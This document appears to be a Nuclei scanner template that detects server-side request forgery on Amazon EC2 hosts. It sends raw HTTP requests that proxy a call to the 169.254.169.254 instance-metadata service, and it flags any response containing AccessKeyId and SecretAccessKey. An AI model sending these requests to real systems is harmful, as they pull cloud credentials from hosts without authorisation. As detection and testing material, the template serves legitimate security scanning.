id: amazon-ec2-ssrf

info:
  name: Amazon EC2 - Server-side request forgery (SSRF)
  author: DhiyaneshDk
  severity: critical
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N
    cvss-score: 9.3
    cwe-id: CWE-441
  metadata:
    verified: true
    max-request: 2
    shodan-query: "Server: EC2ws"
  tags: Amazon-EC2

http:
  - raw:
      - |
        GET {{BaseURL}}/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance HTTP/1.1
        Host: {{Hostname}}

      - |
        @tls-sni: {{Hostname}}
        GET http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance HTTP/1.1
        Host: {{Hostname}}

    stop-at-first-match: true
    unsafe: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "AccessKeyId"
          - "SecretAccessKey"
        condition: and

      - type: status
        status:
          - 200

# digest: 4b0a00483046022100877711098995e2e4b22db20189042cfa4561b9d0b8750e98caeb7213c5f7eaed022100d4e93ecbe6dfc3c8690e323ec50471158bc2751726e46ed78882d4c5fbde16d7:922c64590222798bb761d5b6d8e72950
